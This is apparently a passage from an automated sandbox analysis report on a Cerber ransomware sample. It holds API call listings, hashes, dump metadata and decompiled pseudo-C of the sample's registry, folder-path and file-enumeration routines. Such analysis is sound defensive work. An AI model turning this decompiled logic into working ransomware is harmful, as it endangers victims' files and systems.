                                                                                                                                                                                          • Part of subcall function 0040A419: GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 0040A4BD
                                                                                                                                                                                          • Part of subcall function 0040A419: EqualSid.ADVAPI32(0042FA80,?), ref: 0040A4CF
                                                                                                                                                                                          • Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?), ref: 0040A4E8
                                                                                                                                                                                          • Part of subcall function 0040A419: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A4FB
                                                                                                                                                                                          • Part of subcall function 0040A419: lstrcatW.KERNEL32(?,0040CEC8), ref: 0040A50D
                                                                                                                                                                                          • Part of subcall function 0040A419: FindFirstFileW.KERNEL32(?,?), ref: 0040A586
                                                                                                                                                                                          • Part of subcall function 0040A419: WaitForSingleObject.KERNEL32(00000000), ref: 0040A5A2
                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 0040A78A
                                                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0040A793
                                                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0040A7E5
                                                                                                                                                                                          • Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?,?,0040A367,00000000), ref: 0040A518
                                                                                                                                                                                          • Part of subcall function 0040A419: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A527
                                                                                                                                                                                          • Part of subcall function 0040A419: lstrlenW.KERNEL32(?,0040A367), ref: 0040A5DB
                                                                                                                                                                                          • Part of subcall function 0040A419: lstrlenW.KERNEL32(?), ref: 0040A602
                                                                                                                                                                                          • Part of subcall function 0040A419: CharLowerBuffW.USER32(?,00000000), ref: 0040A610
                                                                                                                                                                                          • Part of subcall function 0040A419: Sleep.KERNEL32(00000001), ref: 0040A621
                                                                                                                                                                                          • Part of subcall function 0040A419: FindNextFileW.KERNEL32(?,?), ref: 0040A690
                                                                                                                                                                                          • Part of subcall function 0040A419: FindClose.KERNEL32(?), ref: 0040A6A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Attributes$Findlstrlen$BuffCharCriticalLowerSectionSecurity$AddressCloseDescriptorEnterEqualFirstHandleIncrementInterlockedLeaveModuleNextObjectOwnerProcSingleSleepWaitlstrcatwsprintf
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2118666660-0
                                                                                                                                                                                        • Opcode ID: 055cac09f6342940aaae60a4afb2c85f3a2abd09d374562fdc8bfdebca7794d3
                                                                                                                                                                                        • Instruction ID: 13abfef68b097a612165134c634928f79b1fba2c5b552c62fd9ab30abf4ee98b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 055cac09f6342940aaae60a4afb2c85f3a2abd09d374562fdc8bfdebca7794d3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F41BC35604301EFC311DF68C884C1ABBB4FB44310B14857AF449AB2A2D334ECA9CFAA
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00406885(void* _a4, short* _a8) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                        				short _v532;
                                                                                                                                                                                        				short _v1052;
                                                                                                                                                                                        				int* _t30;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t30 = 0;
                                                                                                                                                                                        				if(RegOpenKeyExW(_a4, _a8, 0, 0x20119,  &_v8) == 0) {
                                                                                                                                                                                        					_v12 = 0x208;
                                                                                                                                                                                        					if(RegQueryValueExW(_v8, E0040591C( &E0040D340, 0x10, 0xa58690a2), 0, 0,  &_v532,  &_v12) == 0) {
                                                                                                                                                                                        						PathUnquoteSpacesW( &_v532);
                                                                                                                                                                                        						if(ExpandEnvironmentStringsW( &_v532,  &_v1052, 0x104) - 1 <= 0x103) {
                                                                                                                                                                                        							_t30 = E00405933(0,  &_v1052);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					RegCloseKey(_v8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t30;
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,00000000), ref: 004068A1
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?), ref: 004068D7
                                                                                                                                                                                        • PathUnquoteSpacesW.SHLWAPI(?), ref: 004068E8
                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00406901
                                                                                                                                                                                          • Part of subcall function 00405933: lstrlenW.KERNEL32(?,00000000,0040691D,?), ref: 0040593E
                                                                                                                                                                                          • Part of subcall function 00405933: memcpy.NTDLL(00000000,?,00000002,00000000,00000000,0040691D,?), ref: 0040595E
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00406923
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseEnvironmentExpandOpenPathQuerySpacesStringsUnquoteValuelstrlenmemcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2229232589-0
                                                                                                                                                                                        • Opcode ID: d5f94109a22552542f79dd981f8c3c2a9d2cfe73a7d1d7489ccac6e0fbc3d8e3
                                                                                                                                                                                        • Instruction ID: 1c6706bfa8e7cfeb8a905d666c224299092f6be4206dfad9a6d2e40fcb3e7b74
                                                                                                                                                                                        • Opcode Fuzzy Hash: d5f94109a22552542f79dd981f8c3c2a9d2cfe73a7d1d7489ccac6e0fbc3d8e3
                                                                                                                                                                                        • Instruction Fuzzy Hash: E91130B2A0011CBBDB20ABA1DC49DDF7B7CEB04350F004475BA15E2590E6749A988FA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000028,000000FF,00000001,?,00000000), ref: 00405E91
                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0040A04B,000000FF,00000001,?), ref: 00405EAA
                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00000000), ref: 00405EBC
                                                                                                                                                                                        • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00405ED3
                                                                                                                                                                                        • lstrcpyW.KERNEL32(00409B15,?), ref: 00405EE8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FolderPath$lstrcpylstrlen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1609553816-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E004099D8(void* __ecx, void* __edi, WCHAR* _a4) {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				long _t12;
                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                        				long _t27;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                        				_t12 = ExpandEnvironmentStringsW(_a4,  &_v524, 0x104);
                                                                                                                                                                                        				if(_v524 != 0x25) {
                                                                                                                                                                                        					_t13 =  *0x42fac8; // 0x0
                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                        					_t27 =  *0x42fa64; // 0x0
                                                                                                                                                                                        					_t12 = E004053CA(4 + _t13 * 4, _t22, _t27);
                                                                                                                                                                                        					 *0x42fa64 = _t12;
                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                        						CharLowerBuffW( &_v524, lstrlenW( &_v524));
                                                                                                                                                                                        						_t21 = E00405933(0,  &_v524);
                                                                                                                                                                                        						_t25 =  *0x42fac8; // 0x0
                                                                                                                                                                                        						 *0x42fac8 =  *0x42fac8 + 1;
                                                                                                                                                                                        						_t24 =  *0x42fa64; // 0x0
                                                                                                                                                                                        						 *((intOrPtr*)(_t24 + _t25 * 4)) = _t21;
                                                                                                                                                                                        						return _t21;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t12;
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(0040A027,?,00000104), ref: 004099F0
                                                                                                                                                                                          • Part of subcall function 004053CA: GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
                                                                                                                                                                                          • Part of subcall function 004053CA: SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457
                                                                                                                                                                                        • lstrlenW.KERNEL32(00000025), ref: 00409A29
                                                                                                                                                                                        • CharLowerBuffW.USER32(00000025,00000000), ref: 00409A37
                                                                                                                                                                                          • Part of subcall function 00405933: lstrlenW.KERNEL32(?,00000000,0040691D,?), ref: 0040593E
                                                                                                                                                                                          • Part of subcall function 00405933: memcpy.NTDLL(00000000,?,00000002,00000000,00000000,0040691D,?), ref: 0040595E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLastlstrlen$BuffCharEnvironmentExpandLowerStringsmemcpy
                                                                                                                                                                                        • String ID: %
                                                                                                                                                                                        • API String ID: 2407717054-2567322570
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                        			E00409C8E(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                                        				short _v56;
                                                                                                                                                                                        				short _v64;
                                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                                        				signed int _v80;
                                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                        				long _t93;
                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                        				intOrPtr _t103;
                                                                                                                                                                                        				signed int* _t105;
                                                                                                                                                                                        				signed int* _t109;
                                                                                                                                                                                        				intOrPtr _t111;
                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                        				void* _t118;
                                                                                                                                                                                        				intOrPtr _t120;
                                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                        				intOrPtr _t125;
                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                        				signed int _t134;
                                                                                                                                                                                        				intOrPtr _t137;
                                                                                                                                                                                        				void* _t143;
                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                        				void* _t148;
                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                        				signed int* _t154;
                                                                                                                                                                                        				signed int* _t155;
                                                                                                                                                                                        				signed int* _t157;
                                                                                                                                                                                        				signed int* _t160;
                                                                                                                                                                                        				signed int* _t161;
                                                                                                                                                                                        				signed int _t163;
                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                        				void* _t167;
                                                                                                                                                                                        				void* _t168;
                                                                                                                                                                                        				void* _t170;
                                                                                                                                                                                        				signed int _t171;
                                                                                                                                                                                        				void* _t172;
                                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                        				void* _t178;
                                                                                                                                                                                        				void* _t179;
                                                                                                                                                                                        				signed int _t181;
                                                                                                                                                                                        				void* _t186;
                                                                                                                                                                                        				signed int* _t189;
                                                                                                                                                                                        				signed int* _t190;
                                                                                                                                                                                        				signed int* _t191;
                                                                                                                                                                                        				signed int* _t192;
                                                                                                                                                                                        				signed int* _t195;
                                                                                                                                                                                        				signed int* _t196;
                                                                                                                                                                                        				void* _t199;
                                                                                                                                                                                        				signed int _t206;
                                                                                                                                                                                        				void* _t211;
                                                                                                                                                                                        				void* _t213;
                                                                                                                                                                                        				signed int _t224;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t199 = __eflags;
                                                                                                                                                                                        				_t172 = __edx;
                                                                                                                                                                                        				 *0x40f1d8(0x42fad4);
                                                                                                                                                                                        				E0040692E(__ecx, E00409B30, 0);
                                                                                                                                                                                        				_t53 = E00405905( &E0040D17C, 7, 0x80c426c8);
                                                                                                                                                                                        				_t189 =  &(( &_v80)[5]);
                                                                                                                                                                                        				_t177 = E004031AF(_v0, _t199, _t53);
                                                                                                                                                                                        				_t200 = _t177;
                                                                                                                                                                                        				if(_t177 == 0) {
                                                                                                                                                                                        					L10:
                                                                                                                                                                                        					E00409215(_t172, _t208, _v0);
                                                                                                                                                                                        					_t57 = E00405905( &E0040D668, 9, 0x9c36dbf2);
                                                                                                                                                                                        					_t190 =  &(_t189[3]);
                                                                                                                                                                                        					_t186 = E004031AF(_v0, _t208, _t57);
                                                                                                                                                                                        					_t209 = _t186;
                                                                                                                                                                                        					if(_t186 == 0) {
                                                                                                                                                                                        						L30:
                                                                                                                                                                                        						_t60 = E00405905(0x40d834, 9, 0xd1c1cf3d);
                                                                                                                                                                                        						_t191 =  &(_t190[3]);
                                                                                                                                                                                        						_t178 = E004031AF(_v0, _t219, _t60);
                                                                                                                                                                                        						_t220 = _t178;
                                                                                                                                                                                        						if(_t178 == 0) {
                                                                                                                                                                                        							L35:
                                                                                                                                                                                        							 *0x40f93c(0x16, 0, 0x42fa80, 0x40fc68);
                                                                                                                                                                                        							_t224 =  *0x42fa7c; // 0x0
                                                                                                                                                                                        							return 0 | _t224 != 0x00000000;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t66 = E00405905( &E0040D814, 7, 0x79d16581);
                                                                                                                                                                                        						_t192 =  &(_t191[3]);
                                                                                                                                                                                        						_t179 = E004031AF(_t178, _t220, _t66);
                                                                                                                                                                                        						_pop(_t143);
                                                                                                                                                                                        						_t221 = _t179;
                                                                                                                                                                                        						if(_t179 == 0) {
                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E004099D8(_t143, _t175, E0040591C(0x40d840, 0xf, 0x514e394d));
                                                                                                                                                                                        						_t192[3] = 0x3735a35c;
                                                                                                                                                                                        						E004099D8(_t143, _t175, E0040591C());
                                                                                                                                                                                        						E00409AFD(_t221, 0x1a);
                                                                                                                                                                                        						E00409AFD(_t221, 0x1c);
                                                                                                                                                                                        						_t146 = 0x40d850;
                                                                                                                                                                                        						_t75 = E00409518(_t146, _t179, 3);
                                                                                                                                                                                        						_t148 = 0xe;
                                                                                                                                                                                        						 *0x42fa74 = _t75;
                                                                                                                                                                                        						if(_t75 != 0) {
                                                                                                                                                                                        							L34:
                                                                                                                                                                                        							E00409C5C(_t223);
                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_push(0xc);
                                                                                                                                                                                        						_t77 = E004053B4(_t148);
                                                                                                                                                                                        						 *0x42fa74 = _t77;
                                                                                                                                                                                        						_t223 = _t77;
                                                                                                                                                                                        						if(_t77 == 0) {
                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L34;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t78 = E00405905(0x40d7b8, 5, 0xbfa95e66);
                                                                                                                                                                                        					_t195 =  &(_t190[3]);
                                                                                                                                                                                        					_t80 = E004031AF(_t186, _t209, _t78);
                                                                                                                                                                                        					_t135 = _t80;
                                                                                                                                                                                        					_pop(_t149);
                                                                                                                                                                                        					if(_t80 == 0) {
                                                                                                                                                                                        						L17:
                                                                                                                                                                                        						_t81 = E00405905( &E0040D814, 7, 0x79d16581);
                                                                                                                                                                                        						_t196 =  &(_t195[3]);
                                                                                                                                                                                        						_t83 = E004031AF(_t186, _t213, _t81);
                                                                                                                                                                                        						_pop(_t150);
                                                                                                                                                                                        						if(_t83 == 0) {
                                                                                                                                                                                        							L25:
                                                                                                                                                                                        							_t84 = E00405905(0x40d824, 0xa, 0xd9c16e9a);
                                                                                                                                                                                        							_t190 =  &(_t196[3]);
                                                                                                                                                                                        							_t86 = E004031AF(_t186, _t216, _t84);
                                                                                                                                                                                        							_pop(_t151);
                                                                                                                                                                                        							if(_t86 != 0) {
                                                                                                                                                                                        								_t154 = E00409518(_t151, _t86, 1);
                                                                                                                                                                                        								 *0x42fa60 = _t154;
                                                                                                                                                                                        								if(_t154 != 0) {
                                                                                                                                                                                        									_t175 = _t154[2];
                                                                                                                                                                                        									_t90 = E004053CA(4 +  *_t154 * 4, _t154, _t154[2]);
                                                                                                                                                                                        									_t155 =  *0x42fa60; // 0x0
                                                                                                                                                                                        									_t155[2] = _t90;
                                                                                                                                                                                        									_t219 = _t90;
                                                                                                                                                                                        									if(_t90 == 0) {
                                                                                                                                                                                        										 *_t155 =  *_t155 & 0x00000000;
                                                                                                                                                                                        										__eflags =  *_t155;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										_push(0x42fe98);
                                                                                                                                                                                        										_t93 = wsprintfW( &_v64, E0040591C(0x40d830, 3, 0x26e76e6e));
                                                                                                                                                                                        										_t190 =  &(_t190[6]);
                                                                                                                                                                                        										CharLowerBuffW( &_v56, _t93);
                                                                                                                                                                                        										_t97 = E00408E00(_t155,  &_v56);
                                                                                                                                                                                        										_t157 =  *0x42fa60; // 0x0
                                                                                                                                                                                        										 *((intOrPtr*)(_t157[2] +  *_t157 * 4)) = _t97;
                                                                                                                                                                                        										 *_t157 =  *_t157 + 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L30;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t160 = E00409518(_t150, _t83, 2);
                                                                                                                                                                                        						 *0x42faec = _t160;
                                                                                                                                                                                        						if(_t160 == 0) {
                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t175 = _t160[2];
                                                                                                                                                                                        						_t102 = E004053CA( *_t160 +  *0x42fad0 << 2, _t160, _t160[2]);
                                                                                                                                                                                        						_t161 =  *0x42faec; // 0x0
                                                                                                                                                                                        						_t181 = 0;
                                                                                                                                                                                        						_t161[2] = _t102;
                                                                                                                                                                                        						_t216 = _t102;
                                                                                                                                                                                        						if(_t102 != 0) {
                                                                                                                                                                                        							__eflags =  *0x42fad0 - _t181; // 0x0
                                                                                                                                                                                        							if(__eflags <= 0) {
                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								goto L22;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								L22:
                                                                                                                                                                                        								_t103 =  *0x42facc; // 0x0
                                                                                                                                                                                        								_push( *((intOrPtr*)(_t103 + _t181 * 4)));
                                                                                                                                                                                        								_push(E0040591C( &E0040D81C, 4, 0x65dbde8b));
                                                                                                                                                                                        								_t105 =  *0x42faec; // 0x0
                                                                                                                                                                                        								_push(_t105[2] +  *_t105 * 4);
                                                                                                                                                                                        								E00405B0C(_t135,  *_t105, _t175, _t181, __eflags);
                                                                                                                                                                                        								_t109 =  *0x42faec; // 0x0
                                                                                                                                                                                        								_t163 =  *_t109;
                                                                                                                                                                                        								_t174 = _t109[2];
                                                                                                                                                                                        								_t196 =  &(_t196[6]);
                                                                                                                                                                                        								__eflags =  *(_t174 + _t163 * 4);
                                                                                                                                                                                        								if( *(_t174 + _t163 * 4) != 0) {
                                                                                                                                                                                        									_t164 = _t163 + 1;
                                                                                                                                                                                        									__eflags = _t164;
                                                                                                                                                                                        									 *_t109 = _t164;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t181 = _t181 + 1;
                                                                                                                                                                                        								__eflags = _t181 -  *0x42fad0; // 0x0
                                                                                                                                                                                        							} while (__eflags < 0);
                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *_t161 = 0;
                                                                                                                                                                                        						goto L25;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t175 = 0;
                                                                                                                                                                                        					_t211 =  *0x42fac4 - _t175; // 0x0
                                                                                                                                                                                        					if(_t211 <= 0) {
                                                                                                                                                                                        						L16:
                                                                                                                                                                                        						 *0x42fa5c = E00409518(_t149, _t135, 0);
                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						goto L13;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						L13:
                                                                                                                                                                                        						_t111 =  *0x42fa70; // 0x0
                                                                                                                                                                                        						_t114 = E0040562B(0,  *((intOrPtr*)( *((intOrPtr*)(_t111 + _t175 * 4)))));
                                                                                                                                                                                        						_t182 = _t114;
                                                                                                                                                                                        						_pop(_t149);
                                                                                                                                                                                        						if(_t114 != 0) {
                                                                                                                                                                                        							E00402FF6(_t149, _t182);
                                                                                                                                                                                        							_pop(_t149);
                                                                                                                                                                                        							E00403144(_t149);
                                                                                                                                                                                        							E00405463(_t182);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t175 = _t175 + 1;
                                                                                                                                                                                        						_t213 = _t175 -  *0x42fac4; // 0x0
                                                                                                                                                                                        					} while (_t213 < 0);
                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t118 = E00405905(0x40d7b8, 5, 0xbfa95e66);
                                                                                                                                                                                        				_t189 =  &(_t189[3]);
                                                                                                                                                                                        				_t120 = E004031AF(_t177, _t200, _t118);
                                                                                                                                                                                        				_pop(_t167);
                                                                                                                                                                                        				_v76 = _t120;
                                                                                                                                                                                        				_t201 = _t120;
                                                                                                                                                                                        				if(_t120 == 0) {
                                                                                                                                                                                        					L9:
                                                                                                                                                                                        					E00409857(_t167, _t208);
                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t122 = E00403156(_t120, _t201);
                                                                                                                                                                                        				_v80 = _v80 & 0x00000000;
                                                                                                                                                                                        				_v68 = _t122;
                                                                                                                                                                                        				_t202 = _t122;
                                                                                                                                                                                        				if(_t122 == 0) {
                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					L3:
                                                                                                                                                                                        					_t123 = E0040317B(_v76, _t202, _v80);
                                                                                                                                                                                        					_t185 = _t123;
                                                                                                                                                                                        					_pop(_t167);
                                                                                                                                                                                        					_t203 = _t123;
                                                                                                                                                                                        					if(_t123 == 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t125 = E00403156(_t185, _t203);
                                                                                                                                                                                        					_v84 = _v84 & 0x00000000;
                                                                                                                                                                                        					_v72 = _t125;
                                                                                                                                                                                        					_t204 = _t125;
                                                                                                                                                                                        					if(_t125 == 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						L5:
                                                                                                                                                                                        						_t187 = E00402FED(_t167);
                                                                                                                                                                                        						E0040317B(_t185, _t204, _v84);
                                                                                                                                                                                        						_pop(_t168);
                                                                                                                                                                                        						E0040314D(_t168);
                                                                                                                                                                                        						_t137 = E00409518(_t168, _t126, 1);
                                                                                                                                                                                        						_pop(_t170);
                                                                                                                                                                                        						if(_t137 != 0) {
                                                                                                                                                                                        							_t132 =  *0x42fa78; // 0x0
                                                                                                                                                                                        							_t175 =  *0x42fa7c; // 0x0
                                                                                                                                                                                        							_t134 = E004053CA(4 + _t132 * 4, _t170, _t175);
                                                                                                                                                                                        							_t171 =  *0x42fa78; // 0x0
                                                                                                                                                                                        							 *0x42fa78 =  *0x42fa78 + 1;
                                                                                                                                                                                        							_t206 =  *0x42fa78;
                                                                                                                                                                                        							 *0x42fa7c = _t134;
                                                                                                                                                                                        							 *((intOrPtr*)(_t134 + _t171 * 4)) = _t137;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00403085(_t206, _t187);
                                                                                                                                                                                        						_v84 = _v84 + 1;
                                                                                                                                                                                        						_pop(_t167);
                                                                                                                                                                                        					} while (_v84 < _v72);
                                                                                                                                                                                        					L8:
                                                                                                                                                                                        					_v80 = _v80 + 1;
                                                                                                                                                                                        					_t208 = _v80 - _v68;
                                                                                                                                                                                        				} while (_v80 < _v68);
                                                                                                                                                                                        				goto L9;
                                                                                                                                                                                        			}
                                                                                                                                                                                        0x00409f43
                                                                                                                                                                                        0x00409f45
                                                                                                                                                                                        0x00409f4d
                                                                                                                                                                                        0x00409f51
                                                                                                                                                                                        0x00409f5b
                                                                                                                                                                                        0x00409f60
                                                                                                                                                                                        0x00409f66
                                                                                                                                                                                        0x00409f69
                                                                                                                                                                                        0x00409f6b
                                                                                                                                                                                        0x00409fbe
                                                                                                                                                                                        0x00409fbe
                                                                                                                                                                                        0x00409f6d
                                                                                                                                                                                        0x00409f6d
                                                                                                                                                                                        0x00409f8c
                                                                                                                                                                                        0x00409f92
                                                                                                                                                                                        0x00409f9b
                                                                                                                                                                                        0x00409fa6
                                                                                                                                                                                        0x00409fac
                                                                                                                                                                                        0x00409fb7
                                                                                                                                                                                        0x00409fba
                                                                                                                                                                                        0x00409fba
                                                                                                                                                                                        0x00409f6b
                                                                                                                                                                                        0x00409f4d
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409f33
                                                                                                                                                                                        0x00409e8b
                                                                                                                                                                                        0x00409e8d
                                                                                                                                                                                        0x00409e95
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409e9f
                                                                                                                                                                                        0x00409ea5
                                                                                                                                                                                        0x00409eaa
                                                                                                                                                                                        0x00409eb0
                                                                                                                                                                                        0x00409eb2
                                                                                                                                                                                        0x00409eb5
                                                                                                                                                                                        0x00409eb7
                                                                                                                                                                                        0x00409ebd
                                                                                                                                                                                        0x00409ec3
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409ec5
                                                                                                                                                                                        0x00409ec5
                                                                                                                                                                                        0x00409ec5
                                                                                                                                                                                        0x00409eca
                                                                                                                                                                                        0x00409ee1
                                                                                                                                                                                        0x00409ee2
                                                                                                                                                                                        0x00409eef
